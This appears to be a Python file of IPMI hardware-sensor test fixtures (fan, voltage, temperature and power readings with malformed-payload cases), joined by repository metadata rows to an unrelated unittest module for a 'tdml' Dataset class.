'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
'DIMM AB VR Temp (0x38)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '28 (+/- 0.500) degrees C',
'Entity ID': '20.3 (Power Module)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '95.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '105.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '100.000',
'Sensor ID': 'DIMM AB VR Temp (0x38)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
'PCI Riser 1 Temp (0x33)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '38 (+/- 0) degrees C',
'Entity ID': '16.1 (System Internal Expansion Board)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '70.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '85.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '80.000',
'Sensor ID': 'PCI Riser 1 Temp (0x33)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
}
# Test fixture: IPMI "Current" sensor sample, keyed by sensor name.
# All values are verbatim strings as produced by ipmitool-style sensor
# output; this dict is embedded under SENSOR_DATA['payload']['payload'].
CURRENT_DATA = {
    'Avg Power (0x2e)': {
        'Status': 'ok',
        'Sensor Reading': '130 (+/- 0) Watts',
        'Entity ID': '21.0 (Power Management)',
        'Assertions Enabled': '',
        'Event Message Control': 'Per-threshold',
        'Readable Thresholds': 'No Thresholds',
        'Positive Hysteresis': 'Unspecified',
        'Sensor Type (Analog)': 'Current',
        'Negative Hysteresis': 'Unspecified',
        'Maximum sensor range': 'Unspecified',
        'Sensor ID': 'Avg Power (0x2e)',
        'Assertion Events': '',
        # NOTE(review): a minimum range above the reading looks odd, but it
        # is kept verbatim as captured fixture data.
        'Minimum sensor range': '2550.000',
        'Settable Thresholds': 'No Thresholds'
    }
}
# Test fixture: IPMI "Fan" tachometer samples, keyed by sensor name.
# Each entry mirrors ipmitool-style sensor output; readings are strings
# of the form '<rpm> (+/- 0) RPM'. Embedded under SENSOR_DATA's payload.
FAN_DATA = {
    'Fan 4A Tach (0x46)': {
        'Status': 'ok',
        'Sensor Reading': '6900 (+/- 0) RPM',
        'Entity ID': '29.4 (Fan Device)',
        'Assertions Enabled': 'lcr-',
        'Normal Minimum': '2580.000',
        'Positive Hysteresis': '120.000',
        'Assertion Events': '',
        'Event Message Control': 'Per-threshold',
        'Normal Maximum': '15300.000',
        'Deassertions Enabled': 'lcr-',
        'Sensor Type (Analog)': 'Fan',
        'Lower critical': '1920.000',
        'Negative Hysteresis': '120.000',
        'Threshold Read Mask': 'lcr',
        'Maximum sensor range': 'Unspecified',
        'Readable Thresholds': 'lcr',
        'Sensor ID': 'Fan 4A Tach (0x46)',
        'Settable Thresholds': '',
        'Minimum sensor range': 'Unspecified',
        'Nominal Reading': '4020.000'
    },
    'Fan 5A Tach (0x48)': {
        'Status': 'ok',
        'Sensor Reading': '7140 (+/- 0) RPM',
        'Entity ID': '29.5 (Fan Device)',
        'Assertions Enabled': 'lcr-',
        'Normal Minimum': '2580.000',
        'Positive Hysteresis': '120.000',
        'Assertion Events': '',
        'Event Message Control': 'Per-threshold',
        'Normal Maximum': '15300.000',
        'Deassertions Enabled': 'lcr-',
        'Sensor Type (Analog)': 'Fan',
        'Lower critical': '1920.000',
        'Negative Hysteresis': '120.000',
        'Threshold Read Mask': 'lcr',
        'Maximum sensor range': 'Unspecified',
        'Readable Thresholds': 'lcr',
        'Sensor ID': 'Fan 5A Tach (0x48)',
        'Settable Thresholds': '',
        'Minimum sensor range': 'Unspecified',
        'Nominal Reading': '4020.000'
    },
    'Fan 3A Tach (0x44)': {
        'Status': 'ok',
        'Sensor Reading': '6900 (+/- 0) RPM',
        'Entity ID': '29.3 (Fan Device)',
        'Assertions Enabled': 'lcr-',
        'Normal Minimum': '2580.000',
        'Positive Hysteresis': '120.000',
        'Assertion Events': '',
        'Event Message Control': 'Per-threshold',
        'Normal Maximum': '15300.000',
        'Deassertions Enabled': 'lcr-',
        'Sensor Type (Analog)': 'Fan',
        'Lower critical': '1920.000',
        'Negative Hysteresis': '120.000',
        'Threshold Read Mask': 'lcr',
        'Maximum sensor range': 'Unspecified',
        'Readable Thresholds': 'lcr',
        'Sensor ID': 'Fan 3A Tach (0x44)',
        'Settable Thresholds': '',
        'Minimum sensor range': 'Unspecified',
        'Nominal Reading': '4020.000'
    },
    'Fan 1A Tach (0x40)': {
        'Status': 'ok',
        'Sensor Reading': '6960 (+/- 0) RPM',
        'Entity ID': '29.1 (Fan Device)',
        'Assertions Enabled': 'lcr-',
        'Normal Minimum': '2580.000',
        'Positive Hysteresis': '120.000',
        'Assertion Events': '',
        'Event Message Control': 'Per-threshold',
        'Normal Maximum': '15300.000',
        'Deassertions Enabled': 'lcr-',
        'Sensor Type (Analog)': 'Fan',
        'Lower critical': '1920.000',
        'Negative Hysteresis': '120.000',
        'Threshold Read Mask': 'lcr',
        'Maximum sensor range': 'Unspecified',
        'Readable Thresholds': 'lcr',
        'Sensor ID': 'Fan 1A Tach (0x40)',
        'Settable Thresholds': '',
        'Minimum sensor range': 'Unspecified',
        'Nominal Reading': '4020.000'
    },
    # The "B" fans use slightly different calibration values
    # (hysteresis 128 vs 120, nominal 3968 vs 4020) than the "A" fans.
    'Fan 3B Tach (0x45)': {
        'Status': 'ok',
        'Sensor Reading': '7104 (+/- 0) RPM',
        'Entity ID': '29.3 (Fan Device)',
        'Assertions Enabled': 'lcr-',
        'Normal Minimum': '2752.000',
        'Positive Hysteresis': '128.000',
        'Assertion Events': '',
        'Event Message Control': 'Per-threshold',
        'Normal Maximum': '16320.000',
        'Deassertions Enabled': 'lcr-',
        'Sensor Type (Analog)': 'Fan',
        'Lower critical': '1920.000',
        'Negative Hysteresis': '128.000',
        'Threshold Read Mask': 'lcr',
        'Maximum sensor range': 'Unspecified',
        'Readable Thresholds': 'lcr',
        'Sensor ID': 'Fan 3B Tach (0x45)',
        'Settable Thresholds': '',
        'Minimum sensor range': 'Unspecified',
        'Nominal Reading': '3968.000'
    },
    'Fan 2A Tach (0x42)': {
        'Status': 'ok',
        'Sensor Reading': '7080 (+/- 0) RPM',
        'Entity ID': '29.2 (Fan Device)',
        'Assertions Enabled': 'lcr-',
        'Normal Minimum': '2580.000',
        'Positive Hysteresis': '120.000',
        'Assertion Events': '',
        'Event Message Control': 'Per-threshold',
        'Normal Maximum': '15300.000',
        'Deassertions Enabled': 'lcr-',
        'Sensor Type (Analog)': 'Fan',
        'Lower critical': '1920.000',
        'Negative Hysteresis': '120.000',
        'Threshold Read Mask': 'lcr',
        'Maximum sensor range': 'Unspecified',
        'Readable Thresholds': 'lcr',
        'Sensor ID': 'Fan 2A Tach (0x42)',
        'Settable Thresholds': '',
        'Minimum sensor range': 'Unspecified',
        'Nominal Reading': '4020.000'
    },
    'Fan 4B Tach (0x47)': {
        'Status': 'ok',
        'Sensor Reading': '7488 (+/- 0) RPM',
        'Entity ID': '29.4 (Fan Device)',
        'Assertions Enabled': 'lcr-',
        'Normal Minimum': '2752.000',
        'Positive Hysteresis': '128.000',
        'Assertion Events': '',
        'Event Message Control': 'Per-threshold',
        'Normal Maximum': '16320.000',
        'Deassertions Enabled': 'lcr-',
        'Sensor Type (Analog)': 'Fan',
        'Lower critical': '1920.000',
        'Negative Hysteresis': '128.000',
        'Threshold Read Mask': 'lcr',
        'Maximum sensor range': 'Unspecified',
        'Readable Thresholds': 'lcr',
        'Sensor ID': 'Fan 4B Tach (0x47)',
        'Settable Thresholds': '',
        'Minimum sensor range': 'Unspecified',
        'Nominal Reading': '3968.000'
    },
    'Fan 2B Tach (0x43)': {
        'Status': 'ok',
        'Sensor Reading': '7168 (+/- 0) RPM',
        'Entity ID': '29.2 (Fan Device)',
        'Assertions Enabled': 'lcr-',
        'Normal Minimum': '2752.000',
        'Positive Hysteresis': '128.000',
        'Assertion Events': '',
        'Event Message Control': 'Per-threshold',
        'Normal Maximum': '16320.000',
        'Deassertions Enabled': 'lcr-',
        'Sensor Type (Analog)': 'Fan',
        'Lower critical': '1920.000',
        'Negative Hysteresis': '128.000',
        'Threshold Read Mask': 'lcr',
        'Maximum sensor range': 'Unspecified',
        'Readable Thresholds': 'lcr',
        'Sensor ID': 'Fan 2B Tach (0x43)',
        'Settable Thresholds': '',
        'Minimum sensor range': 'Unspecified',
        'Nominal Reading': '3968.000'
    },
    'Fan 5B Tach (0x49)': {
        'Status': 'ok',
        'Sensor Reading': '7296 (+/- 0) RPM',
        'Entity ID': '29.5 (Fan Device)',
        'Assertions Enabled': 'lcr-',
        'Normal Minimum': '2752.000',
        'Positive Hysteresis': '128.000',
        'Assertion Events': '',
        'Event Message Control': 'Per-threshold',
        'Normal Maximum': '16320.000',
        'Deassertions Enabled': 'lcr-',
        'Sensor Type (Analog)': 'Fan',
        'Lower critical': '1920.000',
        'Negative Hysteresis': '128.000',
        'Threshold Read Mask': 'lcr',
        'Maximum sensor range': 'Unspecified',
        'Readable Thresholds': 'lcr',
        'Sensor ID': 'Fan 5B Tach (0x49)',
        'Settable Thresholds': '',
        'Minimum sensor range': 'Unspecified',
        'Nominal Reading': '3968.000'
    },
    'Fan 1B Tach (0x41)': {
        'Status': 'ok',
        'Sensor Reading': '7296 (+/- 0) RPM',
        'Entity ID': '29.1 (Fan Device)',
        'Assertions Enabled': 'lcr-',
        'Normal Minimum': '2752.000',
        'Positive Hysteresis': '128.000',
        'Assertion Events': '',
        'Event Message Control': 'Per-threshold',
        'Normal Maximum': '16320.000',
        'Deassertions Enabled': 'lcr-',
        'Sensor Type (Analog)': 'Fan',
        'Lower critical': '1920.000',
        'Negative Hysteresis': '128.000',
        'Threshold Read Mask': 'lcr',
        'Maximum sensor range': 'Unspecified',
        'Readable Thresholds': 'lcr',
        'Sensor ID': 'Fan 1B Tach (0x41)',
        'Settable Thresholds': '',
        'Minimum sensor range': 'Unspecified',
        'Nominal Reading': '3968.000'
    },
    'Fan 6B Tach (0x4b)': {
        'Status': 'ok',
        'Sensor Reading': '7616 (+/- 0) RPM',
        'Entity ID': '29.6 (Fan Device)',
        'Assertions Enabled': 'lcr-',
        'Normal Minimum': '2752.000',
        'Positive Hysteresis': '128.000',
        'Assertion Events': '',
        'Event Message Control': 'Per-threshold',
        'Normal Maximum': '16320.000',
        'Deassertions Enabled': 'lcr-',
        'Sensor Type (Analog)': 'Fan',
        'Lower critical': '1920.000',
        'Negative Hysteresis': '128.000',
        'Threshold Read Mask': 'lcr',
        'Maximum sensor range': 'Unspecified',
        'Readable Thresholds': 'lcr',
        'Sensor ID': 'Fan 6B Tach (0x4b)',
        'Settable Thresholds': '',
        'Minimum sensor range': 'Unspecified',
        'Nominal Reading': '3968.000'
    },
    'Fan 6A Tach (0x4a)': {
        'Status': 'ok',
        'Sensor Reading': '7080 (+/- 0) RPM',
        'Entity ID': '29.6 (Fan Device)',
        'Assertions Enabled': 'lcr-',
        'Normal Minimum': '2580.000',
        'Positive Hysteresis': '120.000',
        'Assertion Events': '',
        'Event Message Control': 'Per-threshold',
        'Normal Maximum': '15300.000',
        'Deassertions Enabled': 'lcr-',
        'Sensor Type (Analog)': 'Fan',
        'Lower critical': '1920.000',
        'Negative Hysteresis': '120.000',
        'Threshold Read Mask': 'lcr',
        'Maximum sensor range': 'Unspecified',
        'Readable Thresholds': 'lcr',
        'Sensor ID': 'Fan 6A Tach (0x4a)',
        'Settable Thresholds': '',
        'Minimum sensor range': 'Unspecified',
        'Nominal Reading': '4020.000'
    }
}
# Test fixture: IPMI "Voltage" sensor samples, keyed by sensor name.
# Readings are strings of the form '<value> (+/- 0) Volts'. Embedded
# under SENSOR_DATA's payload.
VOLTAGE_DATA = {
    'Planar 12V (0x18)': {
        'Status': 'ok',
        'Sensor Reading': '12.312 (+/- 0) Volts',
        'Entity ID': '7.1 (System Board)',
        'Assertions Enabled': 'lcr- ucr+',
        'Event Message Control': 'Per-threshold',
        'Assertion Events': '',
        'Maximum sensor range': 'Unspecified',
        'Positive Hysteresis': '0.108',
        'Deassertions Enabled': 'lcr- ucr+',
        'Sensor Type (Analog)': 'Voltage',
        'Lower critical': '10.692',
        'Negative Hysteresis': '0.108',
        'Threshold Read Mask': 'lcr ucr',
        'Upper critical': '13.446',
        'Readable Thresholds': 'lcr ucr',
        'Sensor ID': 'Planar 12V (0x18)',
        'Settable Thresholds': 'lcr ucr',
        'Minimum sensor range': 'Unspecified',
        'Nominal Reading': '12.042'
    },
    'Planar 3.3V (0x16)': {
        'Status': 'ok',
        'Sensor Reading': '3.309 (+/- 0) Volts',
        'Entity ID': '7.1 (System Board)',
        'Assertions Enabled': 'lcr- ucr+',
        'Event Message Control': 'Per-threshold',
        'Assertion Events': '',
        'Maximum sensor range': 'Unspecified',
        'Positive Hysteresis': '0.028',
        'Deassertions Enabled': 'lcr- ucr+',
        'Sensor Type (Analog)': 'Voltage',
        'Lower critical': '3.039',
        'Negative Hysteresis': '0.028',
        'Threshold Read Mask': 'lcr ucr',
        'Upper critical': '3.564',
        'Readable Thresholds': 'lcr ucr',
        'Sensor ID': 'Planar 3.3V (0x16)',
        'Settable Thresholds': 'lcr ucr',
        'Minimum sensor range': 'Unspecified',
        'Nominal Reading': '3.309'
    },
    # VBAT only has lower thresholds (lcr/lnc), unlike the rails above.
    'Planar VBAT (0x1c)': {
        'Status': 'ok',
        'Sensor Reading': '3.137 (+/- 0) Volts',
        'Entity ID': '7.1 (System Board)',
        'Assertions Enabled': 'lnc- lcr-',
        'Event Message Control': 'Per-threshold',
        'Assertion Events': '',
        'Readable Thresholds': 'lcr lnc',
        'Positive Hysteresis': '0.025',
        'Deassertions Enabled': 'lnc- lcr-',
        'Sensor Type (Analog)': 'Voltage',
        'Lower critical': '2.095',
        'Negative Hysteresis': '0.025',
        'Lower non-critical': '2.248',
        'Maximum sensor range': 'Unspecified',
        'Sensor ID': 'Planar VBAT (0x1c)',
        'Settable Thresholds': 'lcr lnc',
        'Threshold Read Mask': 'lcr lnc',
        'Minimum sensor range': 'Unspecified',
        'Nominal Reading': '3.010'
    },
    'Planar 5V (0x17)': {
        'Status': 'ok',
        'Sensor Reading': '5.062 (+/- 0) Volts',
        'Entity ID': '7.1 (System Board)',
        'Assertions Enabled': 'lcr- ucr+',
        'Event Message Control': 'Per-threshold',
        'Assertion Events': '',
        'Maximum sensor range': 'Unspecified',
        'Positive Hysteresis': '0.045',
        'Deassertions Enabled': 'lcr- ucr+',
        'Sensor Type (Analog)': 'Voltage',
        'Lower critical': '4.475',
        'Negative Hysteresis': '0.045',
        'Threshold Read Mask': 'lcr ucr',
        'Upper critical': '5.582',
        'Readable Thresholds': 'lcr ucr',
        'Sensor ID': 'Planar 5V (0x17)',
        'Settable Thresholds': 'lcr ucr',
        'Minimum sensor range': 'Unspecified',
        'Nominal Reading': '4.995'
    }
}
# Test fixture: a complete 'hardware.ipmi.metrics.update' notification.
# Note the nested structure: the outer 'payload' carries message metadata
# (instance/node UUIDs, timestamp, event_type) and an inner 'payload'
# mapping sensor category -> per-sensor data.
SENSOR_DATA = {
    'message_id': 'f22188ca-c068-47ce-a3e5-0e27ffe234c6',
    'publisher_id': 'f23188ca-c068-47ce-a3e5-0e27ffe234c6',
    'payload': {
        # NOTE(review): deliberately malformed UUID ('x' digits) — kept
        # verbatim as fixture data.
        'instance_uuid': 'f11251ax-c568-25ca-4582-0x27add644c6',
        'timestamp': '20140223134852',
        'node_uuid': 'f4982fd2-2f2b-4bb5-9aff-48aac801d1ad',
        'event_type': 'hardware.ipmi.metrics.update',
        'payload': {
            'Temperature': TEMPERATURE_DATA,
            'Current': CURRENT_DATA,
            'Fan': FAN_DATA,
            'Voltage': VOLTAGE_DATA
        }
    }
}
# Test fixture: same notification shape as SENSOR_DATA but with an empty
# inner sensor payload — exercises the "no sensors reported" path.
EMPTY_PAYLOAD = {
    'message_id': 'f22188ca-c068-47ce-a3e5-0e27ffe234c6',
    'publisher_id': 'f23188ca-c068-47ce-a3e5-0e27ffe234c6',
    'payload': {
        'instance_uuid': 'f11251ax-c568-25ca-4582-0x27add644c6',
        'timestamp': '20140223134852',
        'node_uuid': 'f4982fd2-2f2b-4bb5-9aff-48aac801d1ad',
        'event_type': 'hardware.ipmi.metrics.update',
        'payload': {
        }
    }
}
# Test fixture: notification whose single Temperature entry omits the
# 'Sensor Reading' key — exercises handling of a missing reading.
MISSING_SENSOR = {
    'message_id': 'f22188ca-c068-47ce-a3e5-0e27ffe234c6',
    'publisher_id': 'f23188ca-c068-47ce-a3e5-0e27ffe234c6',
    'payload': {
        'instance_uuid': 'f11251ax-c568-25ca-4582-0x27add644c6',
        'timestamp': '20140223134852',
        'node_uuid': 'f4982fd2-2f2b-4bb5-9aff-48aac801d1ad',
        'event_type': 'hardware.ipmi.metrics.update',
        'payload': {
            'Temperature': {
                # Same entry as in TEMPERATURE_DATA, minus 'Sensor Reading'.
                'PCI Riser 1 Temp (0x33)': {
                    'Status': 'ok',
                    'Deassertions Enabled': 'unc+ ucr+ unr+',
                    'Entity ID': '16.1 (System Internal Expansion Board)',
                    'Assertions Enabled': 'unc+ ucr+ unr+',
                    'Positive Hysteresis': '4.000',
                    'Assertion Events': '',
                    'Upper non-critical': '70.000',
                    'Event Message Control': 'Per-threshold',
                    'Upper non-recoverable': '85.000',
                    'Normal Maximum': '112.000',
                    'Maximum sensor range': 'Unspecified',
                    'Sensor Type (Analog)': 'Temperature',
                    'Readable Thresholds': 'unc ucr unr',
                    'Negative Hysteresis': 'Unspecified',
                    'Threshold Read Mask': 'unc ucr unr',
                    'Upper critical': '80.000',
                    'Sensor ID': 'PCI Riser 1 Temp (0x33)',
                    'Settable Thresholds': '',
                    'Minimum sensor range': 'Unspecified',
                    'Nominal Reading': '16.000'
                },
            }
        }
    }
}
# Test fixture: notification whose Temperature entry carries an
# unparsable 'Sensor Reading' value — exercises the bad-data path.
BAD_SENSOR = {
    'message_id': 'f22188ca-c068-47ce-a3e5-0e27ffe234c6',
    'publisher_id': 'f23188ca-c068-47ce-a3e5-0e27ffe234c6',
    'payload': {
        'instance_uuid': 'f11251ax-c568-25ca-4582-0x27add644c6',
        'timestamp': '20140223134852',
        'node_uuid': 'f4982fd2-2f2b-4bb5-9aff-48aac801d1ad',
        'event_type': 'hardware.ipmi.metrics.update',
        'payload': {
            'Temperature': {
                'PCI Riser 1 Temp (0x33)': {
                    'Status': 'ok',
                    'Deassertions Enabled': 'unc+ ucr+ unr+',
                    # Deliberately not a '<n> (+/- m) degrees C' string.
                    'Sensor Reading': 'some bad stuff',
                    'Entity ID': '16.1 (System Internal Expansion Board)',
                    'Assertions Enabled': 'unc+ ucr+ unr+',
                    'Positive Hysteresis': '4.000',
                    'Assertion Events': '',
                    'Upper non-critical': '70.000',
                    'Event Message Control': 'Per-threshold',
                    'Upper non-recoverable': '85.000',
                    'Normal Maximum': '112.000',
                    'Maximum sensor range': 'Unspecified',
                    'Sensor Type (Analog)': 'Temperature',
                    'Readable Thresholds': 'unc ucr unr',
                    'Negative Hysteresis': 'Unspecified',
                    'Threshold Read Mask': 'unc ucr unr',
                    'Upper critical': '80.000',
                    'Sensor ID': 'PCI Riser 1 Temp (0x33)',
                    'Settable Thresholds': '',
                    'Minimum sensor range': 'Unspecified',
                    'Nominal Reading': '16.000'
                },
            }
        }
    }
}
# Test fixture: notification whose Temperature entry has a reading but
# no 'Sensor ID' key — exercises handling of an unidentifiable sensor.
NO_SENSOR_ID = {
    'message_id': 'f22188ca-c068-47ce-a3e5-0e27ffe234c6',
    'publisher_id': 'f23188ca-c068-47ce-a3e5-0e27ffe234c6',
    'payload': {
        'instance_uuid': 'f11251ax-c568-25ca-4582-0x27add644c6',
        'timestamp': '20140223134852',
        'node_uuid': 'f4982fd2-2f2b-4bb5-9aff-48aac801d1ad',
        'event_type': 'hardware.ipmi.metrics.update',
        'payload': {
            'Temperature': {
                'PCI Riser 1 Temp (0x33)': {
                    'Sensor Reading': '26 C',
                },
            }
        }
    }
}
# Test fixture: notification whose outer payload omits 'node_uuid' —
# exercises handling of a message with no originating node.
NO_NODE_ID = {
    'message_id': 'f22188ca-c068-47ce-a3e5-0e27ffe234c6',
    'publisher_id': 'f23188ca-c068-47ce-a3e5-0e27ffe234c6',
    'payload': {
        'instance_uuid': 'f11251ax-c568-25ca-4582-0x27add644c6',
        'timestamp': '20140223134852',
        'event_type': 'hardware.ipmi.metrics.update',
        'payload': {
            'Temperature': {
                'PCI Riser 1 Temp (0x33)': {
                    'Sensor Reading': '26 C',
                    'Sensor ID': 'PCI Riser 1 Temp (0x33)',
                },
            }
        }
    }
}
| 37.915829
| 75
| 0.535039
| 3,003
| 30,181
| 5.361971
| 0.105228
| 0.040989
| 0.080611
| 0.040989
| 0.864924
| 0.847038
| 0.8353
| 0.803565
| 0.803565
| 0.782015
| 0
| 0.09209
| 0.298764
| 30,181
| 795
| 76
| 37.963522
| 0.66873
| 0.024519
| 0
| 0.740397
| 0
| 0
| 0.59359
| 0.033853
| 0
| 0
| 0.011013
| 0
| 0.113907
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58554d977eacfb2b3fad7a85a068d00f0bbd8221
| 8,100
|
py
|
Python
|
tests/test_dataset/test_dataset_numpy.py
|
zechengz/tdml
|
af60d35b7b62259e414edaa0a45fb2d3563b0430
|
[
"MIT"
] | 2
|
2020-08-08T00:36:23.000Z
|
2021-06-21T19:51:30.000Z
|
tests/test_dataset/test_dataset_numpy.py
|
zechengz/tdml
|
af60d35b7b62259e414edaa0a45fb2d3563b0430
|
[
"MIT"
] | null | null | null |
tests/test_dataset/test_dataset_numpy.py
|
zechengz/tdml
|
af60d35b7b62259e414edaa0a45fb2d3563b0430
|
[
"MIT"
] | 1
|
2020-10-06T19:40:41.000Z
|
2020-10-06T19:40:41.000Z
|
import os
import numpy as np
import tdml
import unittest
from utils import *
class TestDatasetNumPy(unittest.TestCase):
    """Unit tests for the NumPy-backed ``tdml.Dataset``.

    Exercises construction, transform(), train/test(/val) splitting,
    label/feature mappings, reshuffling, and text-column handling.

    NOTE(review): helpers such as ``generate_simple_pd_dataframe``,
    ``simple_embedding`` and the ``pd`` alias come from ``utils`` via the
    star import at the top of the file; several tests also read CSV files
    from a local ``data/`` directory — confirm those exist when running.
    """

    def test_no_label(self):
        """Dataset with no label exposes all columns as features."""
        df = generate_simple_pd_dataframe()
        # no label, only feature
        ds = tdml.Dataset(df)
        ds.transform()
        self.assertEqual(ds.feature.shape, (10, 5))
        self.assertEqual(ds.num_sample, 10)
        self.assertEqual(ds.num_feature, 5)
        self.assertEqual(ds.num_label, 0)

    def test_label(self):
        """Designating a label column removes it from the feature matrix."""
        df = generate_simple_pd_dataframe()
        # categorical label
        ds = tdml.Dataset(df, label='Evaluation')
        ds.transform()
        self.assertEqual(ds.feature.shape, (10, 4))
        self.assertEqual(ds.num_sample, 10)
        self.assertEqual(ds.num_feature, 4)
        self.assertEqual(ds.num_label, 3)
        # boolean label
        ds = tdml.Dataset(df, label='Dark')
        ds.transform()
        self.assertEqual(ds.feature.shape, (10, 4))
        self.assertEqual(ds.num_sample, 10)
        self.assertEqual(ds.num_feature, 4)
        self.assertEqual(ds.num_label, 2)

    def test_specified_feature(self):
        """Explicit feature selection (single name or list) narrows columns."""
        df = generate_simple_pd_dataframe()
        # one feature
        ds = tdml.Dataset(df, feature='Brand')
        ds.transform()
        self.assertEqual(ds.feature.shape, (10, 1))
        self.assertEqual(ds.num_sample, 10)
        self.assertEqual(ds.label, None)
        self.assertEqual(ds.num_feature, 1)
        self.assertEqual(ds.num_label, 0)
        # two features
        ds = tdml.Dataset(df, feature=['Brand', 'Price'])
        ds.transform()
        self.assertEqual(ds.feature.shape, (10, 2))
        self.assertEqual(ds.num_sample, 10)
        self.assertEqual(ds.label, None)
        self.assertEqual(ds.num_feature, 2)
        self.assertEqual(ds.num_label, 0)

    def test_to_string_before_split(self):
        """str(ds) reflects label/feature shapes and mapping counts pre-split."""
        df = generate_simple_pd_dataframe()
        # no label, only feature
        ds = tdml.Dataset(df)
        ds.transform()
        to_string = 'Dataset(feature=[10, 5], feature_mapping=2)'
        self.assertEqual(to_string, str(ds))
        # categorical label
        ds = tdml.Dataset(df, label='Evaluation')
        ds.transform()
        to_string = 'Dataset(label=[10], feature=[10, 4], label_mapping=3, feature_mapping=1)'
        self.assertEqual(to_string, str(ds))
        # boolean label
        ds = tdml.Dataset(df, label='Dark')
        ds.transform()
        to_string = 'Dataset(label=[10], feature=[10, 4], feature_mapping=2)'
        self.assertEqual(to_string, str(ds))

    def test_split_two_label(self):
        """Random train/test split with a label populates *_x and *_y."""
        df = pd.read_csv('data/GOOG.csv')
        df = df.drop(columns=['Date', 'Adj Close'])
        ds = tdml.Dataset(df, label='Close')
        ds.transform()
        ds.train_test_split(seed=0)
        to_string = 'Dataset(label=[252], feature=[252, 4], train_x=[201, 4], train_y=[201], test_x=[51, 4], test_y=[51])'
        self.assertEqual(to_string, str(ds))
        self.assertEqual(ds.train_x.shape, (201, 4))
        self.assertEqual(ds.test_x.shape, (51, 4))
        self.assertEqual(ds.val_x, None)
        self.assertEqual(ds.train_y.shape, (201, ))
        self.assertEqual(ds.test_y.shape, (51, ))
        self.assertEqual(ds.val_y, None)

    def test_split_two_no_label(self):
        """Train/test split without a label leaves all *_y as None."""
        df = pd.read_csv('data/GOOG.csv')
        df = df.drop(columns=['Date', 'Adj Close'])
        ds = tdml.Dataset(df, feature=['Open', 'High'])
        ds.transform()
        ds.train_test_split(seed=0)
        to_string = 'Dataset(feature=[252, 2], train_x=[201, 2], test_x=[51, 2])'
        self.assertEqual(to_string, str(ds))
        self.assertEqual(ds.train_x.shape, (201, 2))
        self.assertEqual(ds.test_x.shape, (51, 2))
        self.assertEqual(ds.val_x, None)
        self.assertEqual(ds.train_y, None)
        self.assertEqual(ds.test_y, None)
        self.assertEqual(ds.val_y, None)

    def test_split_three_label(self):
        """Three-way split with a label populates train/val/test x and y."""
        df = pd.read_csv('data/GOOG.csv')
        df = df.drop(columns=['Date', 'Adj Close'])
        ds = tdml.Dataset(df, label='Close')
        ds.transform()
        ds.train_val_test_split(seed=0)
        to_string = 'Dataset(label=[252], feature=[252, 4], train_x=[201, 4], train_y=[201], test_x=[26, 4], test_y=[26], val_x=[25, 4], val_y=[25])'
        self.assertEqual(to_string, str(ds))
        self.assertEqual(ds.train_x.shape, (201, 4))
        self.assertEqual(ds.test_x.shape, (26, 4))
        self.assertEqual(ds.val_x.shape, (25, 4))
        self.assertEqual(ds.train_y.shape, (201, ))
        self.assertEqual(ds.test_y.shape, (26, ))
        self.assertEqual(ds.val_y.shape, (25, ))

    def test_split_three_no_label(self):
        """Three-way split without a label leaves all *_y as None."""
        df = pd.read_csv('data/GOOG.csv')
        df = df.drop(columns=['Date', 'Adj Close'])
        ds = tdml.Dataset(df)
        ds.transform()
        ds.train_val_test_split()
        to_string = 'Dataset(feature=[252, 5], train_x=[201, 5], test_x=[26, 5], val_x=[25, 5])'
        self.assertEqual(to_string, str(ds))
        self.assertEqual(ds.train_x.shape, (201, 5))
        self.assertEqual(ds.test_x.shape, (26, 5))
        self.assertEqual(ds.val_x.shape, (25, 5))
        self.assertEqual(ds.train_y, None)
        self.assertEqual(ds.test_y, None)
        self.assertEqual(ds.val_y, None)

    def test_label_mapping(self):
        """label_mapping is None for numeric labels, populated for categorical."""
        df = pd.read_csv('data/GOOG.csv')
        df = df.drop(columns=['Date', 'Adj Close'])
        ds = tdml.Dataset(df, label='Close')
        ds.transform()
        self.assertEqual(ds.label_mapping, None)
        df = generate_simple_pd_dataframe()
        ds = tdml.Dataset(df, label='Evaluation')
        ds.transform()
        self.assertEqual(len(ds.label_mapping), 3)
        self.assertEqual(len(ds.feature_mapping), 1)
        ds = tdml.Dataset(df)
        ds.transform()
        self.assertEqual(ds.label_mapping, None)
        self.assertEqual(len(ds.feature_mapping), 2)

    def test_prespecified_split_two(self):
        """Caller-supplied index arrays drive the two-way split exactly."""
        df = generate_simple_pd_dataframe()
        ds = tdml.Dataset(df, label="Evaluation")
        ds.transform()
        indices = np.arange(10)
        train_split = indices[:7]
        test_split = indices[7:]
        ds.train_test_split(train_split=train_split, test_split=test_split)
        self.assertEqual(ds.train_x.shape, (7, 4))
        self.assertEqual(ds.test_x.shape, (3, 4))
        self.assertEqual(ds.train_y.shape, (7, ))
        self.assertEqual(ds.test_y.shape, (3, ))
        ds = tdml.Dataset(df)
        ds.transform()
        ds.train_test_split(train_split=train_split, test_split=test_split)
        self.assertEqual(ds.train_x.shape, (7, 5))
        self.assertEqual(ds.test_x.shape, (3, 5))
